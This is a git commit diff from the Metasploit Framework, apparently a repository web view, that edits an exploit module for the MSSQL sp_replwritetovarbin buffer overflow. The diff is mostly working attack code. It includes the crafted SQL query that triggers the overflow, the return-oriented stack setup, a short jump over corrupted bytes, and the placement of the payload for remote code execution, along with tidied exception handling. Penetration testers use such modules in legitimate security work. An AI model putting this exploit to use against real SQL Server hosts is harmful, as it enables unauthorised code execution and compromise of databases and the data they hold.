cleanup exceptions, optimize query length, add some entropy
git-svn-id: file:///home/svn/framework3/trunk@8153 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
7c402d1d79
commit
477468147b
|
@ -40,10 +40,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with
|
||||
a displacement of 4. This pointer is not used by this exploit.
|
||||
|
||||
This particular exploit replaces the previous dual-method exploit. It uses
|
||||
This particular exploit replaces the previous dual-method exploit. It uses
|
||||
a technique where the value contained in ecx becomes the stack. From there,
|
||||
return oriented programming is used to normalize the execution state and
|
||||
finally execute the payload via a "jmp esp". All addresses used were found
|
||||
finally execute the payload via a "jmp esp". All addresses used were found
|
||||
within the sqlservr.exe memory space, yielding very reliable code execution
|
||||
using only a single query.
|
||||
},
|
||||
|
@ -253,9 +253,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# since we need to have credentials for this vuln, we just login and run a query
|
||||
# to get the version information
|
||||
version = mssql_query_version
|
||||
if not version
|
||||
return Exploit::CheckCode::Detected
|
||||
if not (version = mssql_query_version)
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
print_status("@@version returned:\n\t" + version)
|
||||
|
||||
|
@ -278,7 +277,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Attempting automatic target detection...")
|
||||
|
||||
version = mssql_query_version
|
||||
raise RuntimError, "Unable to get version!" if not version
|
||||
raise RuntimeError, "Unable to get version!" if not version
|
||||
|
||||
if (version =~ /8\.00\.194/)
|
||||
mytarget = targets[1]
|
||||
|
@ -307,12 +306,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
mytarget = target
|
||||
end
|
||||
|
||||
sqlquery = %Q|declare @i int,@buf nvarchar(4000)
|
||||
set @buf='declare @e int,@b varbinary,@l int;'
|
||||
set @buf=@buf+'exec master.dbo.sp_replwritetovarbin %NUM%,@e out,@b out,@l out,''%STUFF%'','''
|
||||
set @buf=@buf+'1'',''2'',''3'',''4'',''5'',''6'',''7'',''8'''
|
||||
exec master..sp_executesql @buf
|
||||
|
|
||||
sqlquery = %Q|declare @i int,@z nvarchar(4000)
|
||||
set @z='declare @e int,@b varbinary,@l int;'
|
||||
set @z=@z+'exec sp_replwritetovarbin %NUM%,@e out,@b out,@l out,''%STUFF%'',@l,@l,@l,@l,@l,@l,@l,@l'
|
||||
exec sp_executesql @z|
|
||||
|
||||
# just crash it with a pattern buffer if the CRASHER target is selected..
|
||||
if mytarget.name == 'CRASHER'
|
||||
|
@ -331,9 +328,10 @@ exec master..sp_executesql @buf
|
|||
first_esp = mytarget['Popped']
|
||||
fix_esp = mytarget['FixESP']
|
||||
writable = mytarget['Writable']
|
||||
|
||||
corruptable_bytes = 0x44
|
||||
|
||||
# make sploit buff
|
||||
sz = (num + vt_off) + esp_off + 6 + 2 + 0x38 + payload.encoded.length
|
||||
sz = (num + vt_off) + esp_off + (2 + corruptable_bytes) + payload.encoded.length
|
||||
#sploit = Rex::Text.pattern_create(sz)
|
||||
sploit = rand_text_alphanumeric(sz)
|
||||
|
||||
|
@ -357,8 +355,8 @@ exec master..sp_executesql @buf
|
|||
stack << mytarget['Ret']
|
||||
stack = stack.pack('V*')
|
||||
# jump over the stuff that gets corrupted
|
||||
stack << "\xeb\x38"
|
||||
stack << "\xcc" * 0x38
|
||||
stack << "\xeb" + [corruptable_bytes].pack('C')
|
||||
stack << rand_text_alphanumeric(corruptable_bytes)
|
||||
stack << payload.encoded
|
||||
sploit[stack_off,stack.length] = stack
|
||||
|
||||
|
@ -447,9 +445,10 @@ exec master..sp_executesql @buf
|
|||
def mssql_query_version
|
||||
begin
|
||||
logged_in = mssql_login_datastore
|
||||
rescue ::ConnectionRefused
|
||||
raise RuntimeError, "Unable to connect: connection refused"
|
||||
rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EINTR
|
||||
return nil
|
||||
end
|
||||
|
||||
if (not logged_in)
|
||||
raise RuntimeError, "Invalid SQL Server credentials"
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue